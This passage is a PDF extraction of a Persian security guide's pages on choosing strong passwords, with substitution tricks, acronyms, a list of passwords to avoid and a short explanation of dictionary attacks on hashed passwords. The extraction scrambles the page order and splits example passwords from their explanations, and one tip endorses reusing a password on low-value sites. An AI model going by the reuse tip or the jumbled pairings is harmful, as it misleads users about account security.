ﺩﺭﺻﻮﺭﺕ ﺍﻣﻜﺎﻥ ﺍﺯ ﺍﻋـﺪﺍﺩ ﺗﺮﻛﻴﺒـﻲ ،ﻋﻼﻣﺘﻬـﺎﻱ ﻣﺠـﺎﺯ ﻭ
ﻫﻤﭽﻨﻴﻦ ﻓﻀﺎﻫﺎﻱ ﺧﺎﻟﻲ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻴﺪ.
•
ﺍﮔﺮ ﺳﻴﺴﺘﻢ ﺍﺟﺎﺯﻩ ﻣﻲ ﺩﻫﺪ ﻛﻪ ﺍﺯ ﻓـﻀﺎﻱ ﺧـﺎﻟﻲ ﺍﺳـﺘﻔﺎﺩﻩ
ﻛﻨﻴﺪ ﻳﺎ ﺭﻣﺰ ﻋﺒﻮﺭ ﺷـﻤﺎ ﺑـﻪ ﺷـﻜﻞ ﻳـﻚ ﻋﺒـﺎﺭﺕ ﺍﺳـﺖ
ﻣﻲﺗﻮﺍﻧﻴﺪ ﺩﺭ ﺭﻣﺰ ﻋﺒﻮﺭ ﺧﻮﺩ ﺑﻌﻀﻲ ﺍﺯ ﻓﺎﺻﻠﻪﻫﺎ ﺭﺍ ﺣـﺬﻑ
ﻛﻨﻴﺪ )ﻳﻌﻨﻲ ﺭﻣﺰ ﻣﺘﺸﻜﻞ ﺍﺯ ﻟﻐﺎﺗﻲ ﺑﺎﺷﺪ ﻛﻪ ﺑﻪ ﻳﻜﺪﻳﮕﺮ ﭼـﺴﺒﻴﺪﻩ-
ﺍﻧﺪ(.
•
ﺑﺮﺍﻱ ﺍﻳﻨﻜﻪ ﺭﻣﺰ ﻋﺒﻮﺭ ﺧﻮﺩ ﺭﺍ ﺑﻪ ﺁﺳﺎﻧﻲ ﺑﻪ ﺧﺎﻃﺮ ﺑـﺴﭙﺎﺭﻳﺪ
ﻣﻲﺗﻮﺍﻧﻴﺪ ﺍﺯ ﻫﻤﻴﻦ ﺭﻣﺰ ﻋﺒﻮﺭ ﺩﺭ ﭼﻨﺪﻳﻦ ﺳﻴﺴﺘﻢ ﺍﺳﺘﻔﺎﺩﻩ
ﻛﻨﻴﺪ .ﺍﻟﺒﺘﻪ ﺍﮔﺮ ﺍﻳﻨﻜﺎﺭ ﺭﺍ ﺍﻧﺠﺎﻡ ﺩﻫﻴﺪ ﻭ ﻓﺮﺩﻱ ﺭﻣﺰ ﻋﺒـﻮﺭ
ﺷﻤﺎ ﺭﺍ ﺩﺭ ﻳﻜﻲ ﺍﺯ ﺍﻳﻦ ﺳﻴـﺴﺘﻤﻬﺎ ﻛـﺸﻒ ﻛﻨـﺪ ،ﺍﻣﻨﻴـﺖ
ﺳﻴــﺴﺘﻤﻬﺎﻱ ﺩﻳﮕــﺮ ﻛــﻪ ﺩﺭ ﺁﻧﻬــﺎ ﺍﺯ ﺭﻣــﺰ ﻋﺒــﻮﺭ ﻣــﺸﺎﺑﻪ
ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﺮﺩﻳﺪ ﻧﻴﺰ ﺑﻪ ﺧﻄـﺮ ﺧﻮﺍﻫـﺪ ﺍﻓﺘـﺎﺩ .ﺑﻨـﺎﺑﺮﺍﻳﻦ
ﭼﻨﻴﻦ ﺭﻣﺰ ﻋﺒﻮﺭﻱ ﺭﺍ ﺑﺮﺍﻱ ﺳﻴـﺴﺘﻤﻬﺎﻳﻲ ﺍﻧﺘﺨـﺎﺏ ﻛﻨﻴـﺪ
ﻛﻪ ﻧﻴﺎﺯ ﺑﻪ ﺣﻔﺎﻇﺖ ﺧﺎﺻﻲ ﻧﺪﺍﺭﻧﺪ .ﺑﻌﻨـﻮﺍﻥ ﻣﺜـﺎﻝ ﺑـﺮﺍﻱ
ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻣﻄﺎﻟﺐ ﺭﻭﺯﻧﺎﻣﻪﻫﺎ ﻭ ﺩﻳﮕﺮ ﻣﻄﺎﻟﺐ ،ﻧﻴﺎﺯﻱ ﺑـﻪ
ﭘﺮﺩﺍﺧﺖ ﭘﻮﻝ ﻳﺎ ﺍﺭﺍﺋﻪ ﺍﻃﻼﻋـﺎﺕ ﻣﺤﺮﻣﺎﻧـﻪ ﻧﻴـﺴﺖ ،ﺍﻣـﺎ
ﺑﺮﺍﻱ ﺧﻮﺍﻧﺪﻥ ﻣﻘﺎﻻﺕ ﺑﻌﻀﻲ ﺍﺯ ﺭﻭﺯﻧﺎﻣﻪﻫﺎ ﺩﺭ ﭘﺎﻳﮕﺎﻩ ﻭﺏ
ﻣﺮﺑﻮﻃﻪ ﺑﺎﻳﺪ ﻳﻚ ﻧﺎﻡ ﻛﺎﺭﺑﺮﻱ ﻭ ﺭﻣـﺰ ﻋﺒـﻮﺭ ﻭﺍﺭﺩ ﻛﻨﻴـﺪ.
ﺩﺭﻭﺍﻗﻊ ﺁﻧﻬﺎ ﻓﻘﻂ ﻣﻲ ﺧﻮﺍﻫﻨﺪ ﺷﻤﺎ ﺑﻪ ﺳﻴـﺴﺘﻢ ﺁﻧﻬـﺎ ﻭﺍﺭﺩ
ﺷـﻮﻳﺪ؛ ﺑﻨـﺎﺑﺮ ﺍﻳــﻦ ﻣـﻲﺗﻮﺍﻧﻴـﺪ ﺑــﺮﺍﻱ ﺧﻮﺍﻧـﺪﻥ ﻣﻄﺎﻟــﺐ
ﺭﻭﺯﻧﺎﻣﻪﻫﺎﻱ ﻣﺨﺘﻠﻒ ﺍﺯ ﻳﻚ ﺭﻣﺰ ﻋﺒـﻮﺭ ﻣـﺸﺎﺑﻪ ﺍﺳـﺘﻔﺎﺩﻩ
ﻧﻤﺎﻳﻴﺪ.
•
ﺑﻌﻀﻲ ﺍﻓﺮﺍﺩ ﺣﺮﻭﻑ ﺭﺍ ﺑﺎ ﻋﻼﺋﻢ ﻳﺎ ﺍﺭﻗﺎﻡ ﻣـﺸﺎﺑﻪ ﻋـﻮﺽ
ﻣﻲﻛﻨﻨﺪ؛ ﻣﺜ ﹰ
ﻼ ﺍﺯ ﺭﻗﻢ " "1ﺑﺠـﺎﻱ ﺣـﺮﻭﻑ " "Iﻳـﺎ " ،"Lﺍﺯ
ﺷﻤﺎﺭﺓ " "3ﻳﺎ ﻋﻼﻣﺖ " "#ﺑﺠﺎﻱ ﺣﺮﻑ " ،"Eﺍﺯ ﺭﻗﻢ ""0
ﺑﺠﺎﻱ ﺣﺮﻑ " ،"Oﺍﺯ ﻋﻼﻣﺖ "@" ﺑﺠﺎﻱ ﺣـﺮﻑ " ،"Aﻭ
ﺍﺯ ﺭﻗﻢ " "5ﺑﺠﺎﻱ ﺣﺮﻑ " "Sﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻧﻤﺎﻳﻨـﺪ .ﺍﻳﻨﻜـﺎﺭ
ﺗﺮﻓﻨﺪ ﺧﻮﺑﻲ ﺍﺳﺖ ،ﺍﻣﺎ ﺑﻪ ﻳـﺎﺩ ﺩﺍﺷـﺘﻪ ﺑﺎﺷـﻴﺪ ﻛـﻪ ﻳـﻚ
ﻼ ﺁﺷﻨﺎﺳـﺖ .ﺍﻳـﻦ
ﻣﻬﺎﺟﻢ ﺣﺮﻓﻪﺍﻱ ﺑﺎ ﺍﻳﻦ ﺣﻘـﻪﻫـﺎ ﻛـﺎﻣ ﹰ
ﺣﻘﻪﻫﺎ ﻛﺎﺭ ﻭﻱ ﺭﺍ ﻛﻤﻲ ﺳﺨﺖ ﻣﻲﻛﻨﺪ ،ﺍﻣﺎ ﻏﻴﺮ ﻣﻤﻜـﻦ
ﻧﻤﻲﺳﺎﺯﺩ.
•
ﺣﺮﻑ " "Iﺭﺍ ﺑﻪ ﺟﺎﻱ ") "eyeﭼﺸﻢ( ﻳﺎ " "ayeﻳﺎ ﻫﺮ ﻛﻠﻤﺔ
ﻣﻌﻨﺎﺩﺍﺭ ﺩﺭ ﺯﺑﺎﻥ ﺧﻮﺩﺗﺎﻥ ﻋﻮﺽ ﻛﻨﻴﺪ .ﺍﻳﻨﻜﺎﺭ ﺑﺨـﺼﻮﺹ
ﺑﺮﺍﻱ ﻟﻐﺎﺗﻲ ﻣﺜـﻞ " "iconﻛـﻪ ﭘـﺲ ﺍﺯ ﺍﻳـﻦ ﺗﻐﻴﻴـﺮ ﺑـﻪ
" "eyeconﺗﺒﺪﻳﻞ ﻣﻲﺷﻮﺩ ﻣﻔﻴﺪ ﺍﺳﺖ.
ﺑﺨﺶ ﺭﺟﻮﻉ ﻛﻨﻴﺪ(.
ﻗﺎﻧﻮﻥ ﺳﻮﻡ:
ﺍﺯ ﺭﻣﺰ ﻋﺒﻮﺭﻱ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻴﺪ ﻛﻪ ﺑﺘﻮﺍﻥ ﺁﻧـﺮﺍ ﺑﺮﺍﺣﺘـﻲ
ﺑﻪ ﺧﺎﻃﺮ ﺁﻭﺭﺩ ،ﻭﻟﻲ ﺣﺪﺱ ﺯﺩﻥ ﺁﻥ ﺑـﺮﺍﻱ ﺩﻳﮕـﺮﺍﻥ
ﻣﺸﻜﻞ ﺑﺎﺷﺪ.
ﺑﻪ ﻋﻠﺖ ﻓﻘـﺪﺍﻥ ﺍﻣﻨﻴـﺖ ﻻﺯﻡ ﺩﺭ ﺑﻌـﻀﻲ ﺳﻴـﺴﺘﻤﻬﺎﻱ ﻣﻴﺰﺑـﺎﻥ
ﮔﺎﻫﻲ ﺍﻭﻗﺎﺕ ﺍﻳﻦ ﺍﻣﻜﺎﻥ ﻭﺟﻮﺩ ﺩﺍﺭﺩ ﻛﻪ ﻣﻬﺎﺟﻤﺎﻥ ﺑﻪ ﺭﻣﺰ ﻋﺒـﻮﺭ
ﺗﻤﺎﻣﻲ ﻛﺎﺭﺑﺮﺍﻥ ﺩﺳﺖ ﻳﺎﺑﻨﺪ ﻭ ﺭﻣﺰﻫﺎﻱ ﻋﺒﻮﺭ ﺭﻣﺰﮔﺬﺍﺭﻱﺷـﺪﻩ ﺭﺍ
ﻱ
ﺑﻴﺎﺑﻨﺪ .ﺣﺘـﻲ ﺍﮔـﺮ ﺑـﺮﺍﻱ ﺗﻤـﺎﻡ ﺭﻣﺰﻫـﺎﻱ ﻋﺒـﻮﺭ ﺍﺯ ﺭﻣﺰﮔـﺬﺍﺭ ﹺ
ﻳﻜﺴﻮﻳﻪ ﺍﺳﺘﻔﺎﺩﻩ ﺷﺪﻩ ﺑﺎﺷﺪ ﺑﺎﺯ ﻫﻢ ﻣﻤﻜﻦ ﺍﺳﺖ ﻣﻬﺎﺟﻢ ﺑﺘﻮﺍﻧـﺪ
ﺭﻣﺰ ﻋﺒﻮﺭ ﺷﻤﺎ ﺭﺍ ﻛﺸﻒ ﻛﻨﺪ؛ ﭼـﻮﻥ ﺍﻟﮕﻮﺭﻳﺘﻤﻬـﺎﻱ ﺭﻣﺰﮔـﺬﺍﺭﻱ
ﺍﻳﻦ ﺭﻣﺰﻫﺎﻱ ﻋﺒﻮﺭ ﺷﻨﺎﺧﺘﻪﺷﺪﻩ ﻫﺴﺘﻨﺪ ﻭ ﻟﺬﺍ ﻣﻬﺎﺟﻢ ﻣﻲﺗﻮﺍﻧﺪ ﺍﺯ
ﺁﻥ ﺍﻟﮕﻮﺭﻳﺘﻤﻬﺎ ﺑﺮﺍﻱ ﺭﻣﺰﮔﺬﺍﺭﻱ ﻫﻤـﺔ ﻛﻠﻤـﺎﺕ ﺩﺭﻭﻥ ﻓﺮﻫﻨـﮓ
ﻼ ﺍﮔـﺮ
ﻟﻐﺎﺕ ﻭ ﺳﺎﻳﺮ ﺭﻣﺰﻫﺎﻱ ﻋﺒﻮﺭ ﻣﺘﺪﺍﻭﻝ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﺪ .ﻟﺬﺍ ﻣـﺜ ﹰ
ﺷﻤﺎ ﺍﺯ ﻛﻠﻤﺔ birthdayﺑﻌﻨﻮﺍﻥ ﺭﻣﺰ ﻋﺒﻮﺭ ﺍﺳﺘﻔﺎﺩﻩ ﻛﺮﺩﻩ ﺑﺎﺷـﻴﺪ
ﻣﻬﺎﺟﻢ ﻫﻨﮕﺎﻡ ﺭﻣﺰﮔﺬﺍﺭﻱ ﻛﻠﻤـﺔ birthdayﻣﺘﻮﺟـﻪ ﻣـﻲﺷـﻮﺩ
ﻧﺴﺨﺔ ﺭﻣﺰﮔﺬﺍﺭﻱﺷـﺪﻩ ﺁﻥ ﺑـﺎ ﺁﻧﭽـﻪ ﻛـﻪ ﺭﻭﻱ ﺩﻳـﺴﻚ ﺍﺳـﺖ
ﻣﻄﺎﺑﻘﺖ ﺩﺍﺭﺩ ﻭ ﻟﺬﺍ ﺍﺯ ﺁﻥ ﭘﺲ ﺭﻣﺰ ﻋﺒﻮﺭ ﺷﻤﺎ ﺭﺍ ﺧﻮﺍﻫﺪ ﺩﺍﻧﺴﺖ.
ﺍﺯ ﺁﻧﺠﺎ ﻛﻪ ﻛﻞ ﺍﻳﺪﺓ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺭﻣﺰﻫﺎﻱ ﻋﺒﻮﺭ ﺑﺮﺍﻱ ﺻﺪﻭﺭ ﺍﺟﺎﺯﺓ
ﻭﺭﻭﺩ ﺷﻤﺎ ﺑﻪ ﺳﻴﺴﺘﻢ ﺩﺭ ﺯﻣﺎﻥ ﺩﻟﺨﻮﺍﻩ ﻭ ﺩﺷـﻮﺍﺭ ﻛـﺮﺩﻥ ﺣـﺪﺱ
ﺁﻥ ﺗﻮﺳﻂ ﺍﻓﺮﺍﺩ ﺩﻳﮕﺮ ﺍﺳـﺖ ،ﻣـﻲﺗـﻮﺍﻥ ﭼﻨـﺪ ﻣﺸﺨـﺼﻪ ﺑـﺮﺍﻱ
ﺭﻣﺰﻫﺎﻱ ﻋﺒﻮﺭ ﻣﺴﺘﺤﻜﻢ ﺑﺮ ﺷـﻤﺮﺩ .ﻣـﺸﺎﺑﻪ ﻧﺎﻣﻬـﺎﻱ ﻛـﺎﺭﺑﺮﻱ،
ﺍﻳﻨﺠﺎ ﻧﻴﺰ ﺳﻴﺴﺘﻤﻬﺎﻱ ﻣﺨﺘﻠﻒ ﻗـﻮﺍﻧﻴﻦ ﻣﺘﻔـﺎﻭﺗﻲ ﺭﺍ ﺑـﺮﺍﻱ ﺭﻣـﺰ
ﻋﺒﻮﺭ ﺩﺭﻧﻈﺮ ﮔﺮﻓﺘﻪﺍﻧﺪ )ﺣﺪﺍﻗﻞ ﻭ ﺣـﺪﺍﻛﺜﺮ ﻃـﻮﻝ ،ﺣـﺮﻭﻑ ﻣﺠـﺎﺯ ﺑـﺮﺍﻱ
ﺍﺳﺘﻔﺎﺩﻩ ،ﻭ ﺳﺎﻳﺮ ﻣﻮﺍﺭﺩ(.
•
ﻫﺮﮔﺰ ﺍﺯ ﻳﻚ ﻛﻠﻤﺔ ﻣﻨﻔﺮﺩ ﺩﺭ ﺯﺑﺎﻥ ﻣﺎﺩﺭﻱ ﺧـﻮﺩ ﺑﻌﻨـﻮﺍﻥ
ﺭﻣﺰ ﻋﺒﻮﺭ ﺍﺳﺘﻔﺎﺩﻩ ﻧﻜﻨﻴـﺪ .ﺍﻧﺘﺨـﺎﺏ ﻳـﻚ ﻋﺒـﺎﺭﺕ ،ﻳـﻚ
ﺟﻤﻠــﻪ ،ﻭ ﻳــﺎ ﻗﻄﻌــﺎﺗﻲ ﺍﺯ ﻛﻠﻤــﺎﺕ ﺑــﺮﺍﻱ ﺍﻳــﻦ ﻣﻨﻈــﻮﺭ
ﻣﻨﺎﺳﺐﺗﺮ ﺍﺳﺖ.
•
ﭼﻨﺎﻧﭽﻪ ﺳﻴﺴﺘﻢ ﻫﻢ ﺣﺮﻭﻑ ﺑﺰﺭﮒ ﻭ ﻫﻢ ﺣﺮﻭﻑ ﻛﻮﭼﻚ
ﺭﺍ ﺩﺭ ﺭﻣﺰﻫﺎﻱ ﻋﺒﻮﺭ ﺑﻌﻨﻮﺍﻥ ﺣﺮﻭﻑ ﻣﺠﺎﺯ ﻗﻠﻤﺪﺍﺩ ﻣﻲﻛﻨﺪ،
ﺍﺯ ﻫﺮ ﺩﻭﻱ ﺁﻧﻬﺎ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻴﺪ -ﻭﻟﻲ ﻧﻪ ﺩﺭ ﺟﺎﻱ ﺻﺤﻴﺢ
ﻲ ﺧﻮﺩ.
ﻭ ﻗﺎﺑﻞ ﭘﻴﺶﺑﻴﻨ ﹺ
٦٣
ﺑﺨﺶ ﺩﻭﻡ :ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﮐﺎﺭﺑﺮﺍﻥ ﻣﻨﻔﺮﺩ
o
o
o
o
o
o
o
o
o
o
o
o
o
•
ﺩﺭ ﺑﻌﻀﻲ ﺳﻴﺴﺘﻤﻬﺎ ﺗﻌﺪﺍﺩ ﺣﺮﻭﻑ ﺭﻣﺰ ﻋﺒﻮﺭ ﺑﺎﻳﺪ ﺍﺯ ﻣﻘـﺪﺍﺭ
ﻣﻌﻴﻨﻲ ﺑﻴﺸﺘﺮ ﺑﺎﺷﺪ ﻭ ﻳـﺎ ﺗﻌـﺪﺍﺩ ﻣﺸﺨـﺼﻲ ﺍﺯ ﺣـﺮﻭﻑ ﻭ
ﺍﺭﻗﺎﻡ ﺑﻪ ﺍﺗﻔﺎﻕ ﻫﻢ ﺭﺍ ﺩﺭ ﺑﺮ ﮔﻴﺮﺩ .ﺍﮔـﺮ ﺩﺭ ﺗﺎﻳـﭗ ﻛـﺮﺩﻥ
ﺣﺮﻭﻑ ﺿﻌﻴﻒ ﺑﺎﺷﻴﺪ ﻭ ﻓﺮﺩﻱ ﺍﺯ ﭘﺸﺖ ﺳـﺮ ﺑـﻪ ﺷـﻤﺎ ﻭ
ﺻﻔﺤﻪﻛﻠﻴﺪ ﻧﮕﺎﻩ ﻛﻨﺪ ،ﺧﻮﺍﻫﺪ ﺗﻮﺍﻧﺴﺖ ﺭﻣﺰ ﻋﺒﻮﺭ ﺷـﻤﺎ ﺭﺍ
ﺑﻔﻬﻤﺪ.
ﺭﻣﺰ ﻋﺒﻮﺭ
ﺗﻮﺿﻴﺤﺎﺕ
ﻋﺒــﺎﺭﺗﻲ ﻛــﻪ ﺑــﺴﻴﺎﺭﻱ ﺍﺯ ﻛــﺎﺭﺑﺮﺍﻥ ﺭﺍﻳﺎﻧــﻪ ﺑــﺎ ﺁﻥ
ﻣﻮﺍﻓﻖ ﻫﺴﺘﻨﺪ.
ﻗﺮﺍﺭ ﺩﺍﺩﻥ ﻳﻚ ﺟـﺎﻱ ﺧـﺎﻟﻲ ﻣﻨﺎﺳـﺐ ﻭ ﺍﺳـﺘﻔﺎﺩﻩ
ﻃﻨﺰﺁﻣﻴﺰ ﺍﺯ ﺣﺮﻭﻑ ﺑﺰﺭﮒ.
ﺭﻗﻢ " "0ﺑﺠﺎﻱ ﺣﺮﻑ " "5" ،"Oﺑﺠـﺎﻱ ""@" ،"S
ﺑﺠﺎﻱ " "#" ،"aﺑﺠـﺎﻱ " "V" ،"Eﺑﺠـﺎﻱ " ،"Uﻭ
" "1ﺑﺠﺎﻱ ﺣﺮﻑ ""L؛ ﺩﺭ ﺍﻳﻦ ﻣﺜـﺎﻝ ﺟـﺎﻱ ﺧـﺎﻟﻲ
ﻭﺟﻮﺩ ﻧﺪﺍﺭﺩ.
ﻋﺒــﺎﺭﺕ ﺍﻭﻟﻴــﻪ ﺑــﺪﻭﻥ ﺟــﺎﻱ ﺧــﺎﻟﻲ ﻭ ﻗــﺮﺍﺭﺩﺍﺩﻥ
ﺷﻤﺎﺭﻩﻫﺎﻳﻲ ﺑﻴﻦ ﻫﺮ ۴ﺣﺮﻑ.
ﻋﺒﺎﺭﺕ ﺍﻭﻟﻴﻪ ﺑﺎ ﭼﻨﺪ ﺣﺮﻑ ﺟﺎ ﺍﻓﺘﺎﺩﻩ.
ﺑﺨﺶ ﺩﻭﻡ
o
Comutrsa
reusful
o
Comp9uter8sa
re7usef6ul
o
ﻳﻚ ﻧﺎﻡ ﻳﺎ ﻣﺸﺘﻘﺎﺕ ﺁﻥ؛
ﻧﺎﻡ ﻛﺎﺭﺑﺮﻱ ﻳﺎ ﺍﺳﻢ ﻣﺴﺘﻌﺎﺭ ﺧﻮﺩﺗﺎﻥ؛
ﻧﺎﻡ ﻫﻤﺴﺮ ،ﻳﺎ ﺍﺳﺎﻣﻲ ﻓﺮﺯﻧﺪﺍﻥ ﻭ ﻭﺍﻟﺪﻳﻦ؛
ﺍﺳﺎﻣﻲ ﺩﻭﺳﺘﺎﻥ ،ﺭﺅﺳﺎ ﻭ ﻳﺎ ﻫﻤﻜﺎﺭﺍﻥ؛
ﺍﺳﺎﻣﻲ ﺣﻴﻮﺍﻧﺎﺕ ﺧﺎﻧﮕﻲ؛
ﺭﻭﺯ ﺗﻮﻟﺪ ﺧﻮﺩ ﻳﺎ ﻫﺮﻳﻚ ﺍﺯ ﺩﻭﺳﺘﺎﻥ ﻭ ﺧﻮﻳﺸﺎﻭﻧﺪﺍﻥ؛
ﺷﻤﺎﺭﺓ ﺗﻠﻔﻦ ،ﺷﻤﺎﺭﺓ ﮔﻮﺍﻫﻴﻨﺎﻣﻪ ﻳﺎ ﻣﺪﺍﺭﻙ ﻣﺸﺎﺑﻪ؛
ﺭﻧﮓ ﻣﻮﺭﺩ ﻋﻼﻗﻪ؛
ﻣﻘﺎﻡ ﻳﺎ ﻋﻨﻮﺍﻥ ﺷﻐﻠﻲ؛
ﻧﺎﻡ ﺳﺎﺯﻣﺎﻧﻲ ﻛﻪ ﺩﺭ ﺁﻥ ﻛﺎﺭ ﻣﻲﻛﻨﻴﺪ؛
ﻫﺮ ﭼﻴﺰ ﺩﻳﮕﺮﻱ ﻛﻪ ﺑﺎ ﺁﻥ ﺷﻨﺎﺧﺘﻪ ﻣﻲﺷﻮﻳﺪ؛
ﺭﻣﺰﻫــﺎﻱ ﻋﺒــﻮﺭ ﻛﻼﺳــﻴﻚ ﻣﺜــﻞ " "Xyzzyﻳــﺎ
") "Ploverﺭﻣﺰﻫﺎﻱ ﻋﺒـﻮﺭ ﻣـﻮﺭﺩ ﺍﺳـﺘﻔﺎﺩﻩ ﺩﺭ ﺑـﺴﻴﺎﺭﻱ ﺍﺯ
ﺑﺎﺯﻱﻫﺎﻱ ﺭﺍﻳﺎﻧﻪﺍﻱ( ،ﻭ ""open sesame؛
ﻟﻐﺎﺗﻲ ﻛﻪ ﺩﺭ ﻓﻴﻠﻤﻬﺎﻱ ﻣﺤﺒـﻮﺏ ﻭ ﻣﻌـﺮﻭﻑ ،ﺍﺧﺒـﺎﺭ،
ﺩﺍﺳﺘﺎﻧﻬﺎ ﻭ ﻳﺎ ﺍﺩﺑﻴﺎﺕ ﺍﺯ ﺁﻧﻬﺎ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﺷـﻮﺩ؛ ﻣﺜـﻞ
" "Lord of the Rings" ،"Harry Potterﻭ
""Gone with the Wind؛
ﺣﺮﻭﻑ ﺭﻭﻱ ﺻـﻔﺤﻪﻛﻠﻴـﺪ ﻛـﻪ ﺩﺭ ﻛﻨـﺎﺭ ﻫـﻢ ﻗـﺮﺍﺭ
ﮔﺮﻓﺘﻪﺍﻧﺪ ﻣﺎﻧﻨﺪ ""SDFGHJ؛
ﻣﺜﺎﻟﻬﺎﻱ ﻗﺒﻞ ﺑﻪ ﺍﺿﺎﻓﺔ ﻳﻚ ﺭﻗﻢ ﻗﺒﻞ ﻭ ﺑﻌﺪ ﺍﺯ ﺁﻧﻬﺎ؛
ﺗﻜﺮﺍﺭ ﺣﺮﻭﻑ ﻳﺎ ﺍﺭﻗﺎﻡ ﺩﺭ ﻛﻨﺎﺭ ﻫﻢ ﻳﺎ ﺑﺼﻮﺭﺕ ﺗﺮﺗﻴﺒﻲ
ﻣﺜﻞ " "aaaa9999" ،"۱۲۳۴۵۶ﻳﺎ "."ABCDE
@C0mputer5
reus#fv1
•
ﻫﺮﮔﺰ ﺍﺯ ﻣﻮﺍﺭﺩ ﺯﻳﺮ ﺑﻌﻨﻮﺍﻥ ﺭﻣﺰ ﻋﺒﻮﺭ ﺧﻮﺩ ﺍﺳﺘﻔﺎﺩﻩ ﻧﻜﻨﻴﺪ:
ﺑﻬﺘﺮﻳﻦ ﺭﻣﺰ ﻋﺒﻮﺭ ،ﺭﺷﺘﻪﺍﻱ ﺗﺼﺎﺩﻓﻲ ﺍﺯ ﺣﺮﻭﻑ ﻭ ﺍﺭﻗﺎﻡ ﺍﺳﺖ ،ﺍﻣﺎ
ﺑﺮﺍﻱ ﺍﻛﺜﺮ ﻣﺎ ﺑﺨﺎﻃﺮ ﺳﭙﺮﺩﻥ ﺍﻳﻦ ﺭﻣﺰﻫﺎﻱ ﻋﺒﻮﺭ ﺑـﺴﻴﺎﺭ ﺳـﺨﺖ
ﻼ ﺟﺎﻟـﺐ ﻧﻴـﺴﺖ ﻛـﻪ ﺭﻣـﺰ ﻋﺒـﻮﺭ ﺩﺭ ﻳـﻚ ﺩﻓﺘـﺮ
ﻣﻲﺑﺎﺷﺪ .ﺍﺻ ﹰ
ﻳﺎﺩﺩﺍﺷﺖ ﻳﺎ ﺯﻳﺮ ﺻﻔﺤﻪﻛﻠﻴـﺪ ﻧﻮﺷـﺘﻪ ﺷـﺪﻩ ﺑﺎﺷـﺪ .ﻣﺜﺎﻟﻬـﺎﻳﻲ ﺍﺯ
ﺭﻣﺰﻫﺎﻱ ﻋﺒﻮﺭ ﻣﻨﺎﺳﺐ ﺑﺮﺍﻱ ﺳﻴﺴﺘﻤﻬﺎﻳﻲ ﻛﻪ ﺣﺮﻭﻑ ،ﺷﻤﺎﺭﻩﻫﺎ،
ﻧﺸﺎﻧﻪ ﻫﺎﻱ ﺧﺎﺹ ﻭ ﺟﺎﻫﺎﻱ ﺧﺎﻟﻲ ﺭﺍ ﻣﻲ ﭘﺬﻳﺮﻧﺪ ﻭ ﻣﻴﺎﻥ ﺣـﺮﻭﻑ
ﻼ ﺍﺭﺍﺋﻪ ﺷﺪﻩﺍﻧـﺪ .ﺍﻳـﻦ
ﻛﻮﭼﻚ ﻭ ﺑﺰﺭﮒ ﺗﻔﺎﻭﺕ ﻗﺎﺋﻞ ﻣﻲﺷﻮﻧﺪ ﺫﻳ ﹰ
ﺭﻣﺰﻫﺎ ﺑﺴﺎﺩﮔﻲ ﺑﻪ ﺧﺎﻃﺮ ﺳﭙﺮﺩﻩ ﻣﻲﺷـﻮﻧﺪ ،ﺍﻣـﺎ ﻳـﺎﻓﺘﻦ ﺁﻧﻬـﺎ ﺩﺭ
ﻓﺮﻫﻨﮕﻬﺎﻱ ﻟﻐﺎﺕ ﻭ ﻳﺎ ﺣﺪﺱ ﺯﺩﻧﺸﺎﻥ ﺑﺴﻴﺎﺭ ﺩﺷﻮﺍﺭ ﻣﻲﺑﺎﺷﺪ.
Computers
aReuseFul
•
ﻫﺠﻲ ﻛﺮﺩﻥ ﻟﻐﺎﺕ ﺑﺼﻮﺭﺕ ﺑﺮﻋﻜﺲ ﺁﻧﻬﺎ ﺭﺍ ﻛﻤﻲ ﻣـﺒﻬﻢ
ﻣﻲﻛﻨﺪ ،ﺍﻣﺎ ﺷﻨﺎﺳﺎﻳﻲﺷﺎﻥ ﺭﺍ ﺳﺨﺖ ﻧﻤﻲﻧﻤﺎﻳﺪ.
•
ﻫﺮﮔـﺰ ﻓﻬﺮﺳـﺖ ﺭﻣﺰﮔـﺬﺍﺭﻱﻧـﺸﺪﺓ ﺭﻣﺰﻫـﺎﻱ ﻋﺒـﻮﺭ ﺭﺍ ﺩﺭ
ﻓﺎﻳﻠﻬﺎﻱ ﺭﺍﻳﺎﻧﻪﺍﻱ ﺫﺧﻴﺮﻩ ﻧﻜﻨﻴﺪ.
Computers
Are Useful
•
ﺍﺯ ﺳﺮﻧﺎﻡﻫﺎ )ﺣﺮﻭﻑ ﺍﻭﻝ ﻟﻐﺘﻬﺎﻱ ﺳﺎﺯﻧﺪﻩ ﻳﻚ ﻋﺒﺎﺭﺕ( ﺍﺳـﺘﻔﺎﺩﻩ
ﻧﻤﺎﻳﻴﺪ .ﺑﻌﻨـﻮﺍﻥ ﻣﺜـﺎﻝ " "tgbwcﺳـﺮﻧﺎﻣﻲ ﺑـﺮﺍﻱ ﺷـﻌﺎﺭ
ﻣﻌـﺮﻭﻑ ﻛﻮﻛـﺎﻛﻮﻻ )"("Things Go Better With Coke
ﻣﻲﺑﺎﺷﺪ.
•
ﺭﻣﺰ ﻋﺒﻮﺭ ﻫﺮﭼﻪ ﻛﻪ ﺑﺎﺷﺪ ﺑﺎﻳﺪ ﺑﺪﻭﻥ ﻧﻮﺷﺘﻦ ﺁﻧـﺮﺍ ﺑﺨـﺎﻃﺮ
ﺑﺴﭙﺎﺭﻳﺪ .ﻫﺮﮔﺰ ﺭﻣﺰ ﻋﺒـﻮﺭ ﺭﺍ ﺟـﺎﻳﻲ ﻧﻨﻮﻳـﺴﻴﺪ ﻭ ﺁﻧـﺮﺍ ﺩﺭ
ﻣﺤﻞ ﻛﺎﺭ ﻳﺎ ﺭﻭﻱ ﺑﺮﭼﺴﺒﻬﺎﻱ ﻋﻨﺎﻭﻳﻦ ﻗﺮﺍﺭ ﻧﺪﻫﻴﺪ.
٦٤
Onupatithwa
ﺩﺭ ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﻛﺸﻮﺭﻫﺎﻳﻲ ﻛﻪ ﺳﻨﹼﺖ ﻗـﺼﻪ ﮔـﻮﻳﻲ
